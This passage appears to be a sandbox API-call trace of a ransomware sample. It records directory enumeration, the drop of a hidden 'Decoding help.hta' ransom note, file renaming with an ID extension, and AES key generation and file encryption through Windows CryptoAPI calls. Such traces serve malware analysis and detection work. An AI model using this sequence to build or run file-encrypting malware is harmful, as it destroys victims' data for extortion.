lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*" [0041.095] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.095] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x111e3d58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.104] CloseHandle (hObject=0x384) returned 1 [0041.104] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0041.104] lstrcmpW (lpString1=".", lpString2="Triedit") returned -1 [0041.104] lstrcmpW (lpString1="..", lpString2="Triedit") returned -1 [0041.104] lstrcmpiW (lpString1="windows", lpString2="Triedit") returned 1 [0041.104] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.104] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="Triedit" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit" [0041.104] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*.*" [0041.105] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94d8800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.115] CloseHandle (hObject=0x384) returned 1 [0041.115] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0041.115] lstrcmpW (lpString1=".", lpString2="VBA") returned -1 [0041.115] lstrcmpW (lpString1="..", lpString2="VBA") returned -1 [0041.115] lstrcmpiW (lpString1="windows", lpString2="VBA") returned 1 [0041.118] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.118] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="VBA" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA" [0041.118] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*.*" [0041.118] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11243ef8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.123] CloseHandle (hObject=0x384) returned 1 [0041.123] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0041.123] lstrcmpW (lpString1=".", lpString2="VC") returned -1 [0041.123] lstrcmpW (lpString1="..", lpString2="VC") returned -1 [0041.123] lstrcmpiW (lpString1="windows", lpString2="VC") returned 1 [0041.126] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.126] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.126] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="VC" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC" [0041.126] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*.*" [0041.126] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1125bf60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.133] CloseHandle (hObject=0x384) returned 1 [0041.133] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0041.133] lstrcmpW (lpString1=".", lpString2="VGX") returned -1 [0041.133] lstrcmpW (lpString1="..", lpString2="VGX") returned -1 [0041.133] lstrcmpiW (lpString1="windows", lpString2="VGX") returned 1 [0041.133] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.133] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="VGX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX" [0041.133] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*.*" [0041.133] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4148250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.145] CloseHandle (hObject=0x384) returned 1 [0041.145] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0041.146] lstrcmpW (lpString1=".", lpString2="Visio Shared") returned -1 [0041.146] lstrcmpW (lpString1="..", lpString2="Visio Shared") returned -1 [0041.146] lstrcmpiW (lpString1="windows", lpString2="Visio Shared") returned 1 [0041.149] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.149] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.149] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="Visio Shared" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared" [0041.149] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*.*" [0041.149] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.149] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11273fc8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.609] CloseHandle (hObject=0x384) returned 1 [0041.609] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0041.610] lstrcmpW (lpString1=".", lpString2="VSTO") returned -1 [0041.610] lstrcmpW (lpString1="..", lpString2="VSTO") returned -1 [0041.610] lstrcmpiW (lpString1="windows", lpString2="VSTO") returned 1 [0041.610] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.610] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.610] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="VSTO" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO" [0041.610] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*" [0041.610] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.610] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a00ad8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.611] CloseHandle (hObject=0x384) returned 1 [0041.611] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0041.611] lstrcmpW (lpString1=".", lpString2="Web Folders") returned -1 [0041.611] lstrcmpW (lpString1="..", lpString2="Web Folders") returned -1 [0041.611] lstrcmpiW (lpString1="windows", lpString2="Web Folders") returned 1 [0041.614] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.614] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.614] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="Web Folders" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders" [0041.614] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*" [0041.614] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e28a70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.615] CloseHandle (hObject=0x384) returned 1 [0041.615] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0041.615] lstrcmpW (lpString1=".", lpString2="Web Server Extensions") returned -1 [0041.615] lstrcmpW (lpString1="..", lpString2="Web Server Extensions") returned -1 [0041.615] lstrcmpiW (lpString1="windows", lpString2="Web Server Extensions") returned 1 [0041.617] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0041.617] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0041.617] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="Web Server Extensions" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions" [0041.617] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*.*" [0041.617] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0041.617] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e40ad8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0041.618] CloseHandle (hObject=0x384) returned 1 [0041.618] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0041.618] FindClose (in: hFindFile=0x5a57f0 | out: hFindFile=0x5a57f0) returned 1 Thread: id = 112 os_tid = 0xbf8 [0040.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a57f0 [0041.754] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.754] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.755] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.755] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.755] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0041.755] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" [0041.755] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.755] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.755] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b0 [0041.991] WriteFile (in: hFile=0x4b0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x36cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x36cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.991] CloseHandle (hObject=0x4b0) returned 1 [0041.992] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.992] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PowerPointMUI.msi") returned -1 [0041.992] lstrlenW (lpString="PowerPointMUI.msi") returned 17 [0041.992] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" [0041.992] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.992] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="PowerPointMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" [0041.992] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" [0041.992] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0041.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.993] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b0 [0041.993] CreateFileMappingA (hFile=0x4b0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4b4 [0041.993] CryptAcquireContextA (in: phProv=0x36cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x36cfcec*=0x344a0a0) returned 1 [0045.215] CryptGenKey (in: hProv=0x344a0a0, Algid=0x6610, dwFlags=0x1, phKey=0x36cfce8 | out: phKey=0x36cfce8*=0x5a5d70) returned 1 [0045.215] CryptExportKey (in: hKey=0x5a5d70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x36cfbe4, pdwDataLen=0x36cfce4 | out: pbData=0x36cfbe4*, pdwDataLen=0x36cfce4*=0x2c) returned 1 [0045.215] MapViewOfFile (hFileMappingObject=0x4b4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x64d0000 [0045.232] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36cfbe4*, pdwDataLen=0x36cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x36cfbe4*, pdwDataLen=0x36cfcf8*=0x100) returned 1 [0045.233] CryptEncrypt (in: hKey=0x5a5d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x64d0000, pdwDataLen=0x36cfce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x64d0000*, pdwDataLen=0x36cfce4*=0x100000) returned 1 [0046.753] UnmapViewOfFile (lpBaseAddress=0x64d0000) returned 1 [0046.766] CloseHandle (hObject=0x4b4) returned 1 [0046.766] CryptDestroyKey (hKey=0x5a5d70) returned 1 [0046.766] CryptReleaseContext (hProv=0x344a0a0, dwFlags=0x0) returned 1 [0046.766] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.766] WriteFile (in: hFile=0x4b0, lpBuffer=0x36cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x36cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x36cfbe4*, lpNumberOfBytesWritten=0x36cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.869] WriteFile (in: hFile=0x4b0, lpBuffer=0x4040f0*, 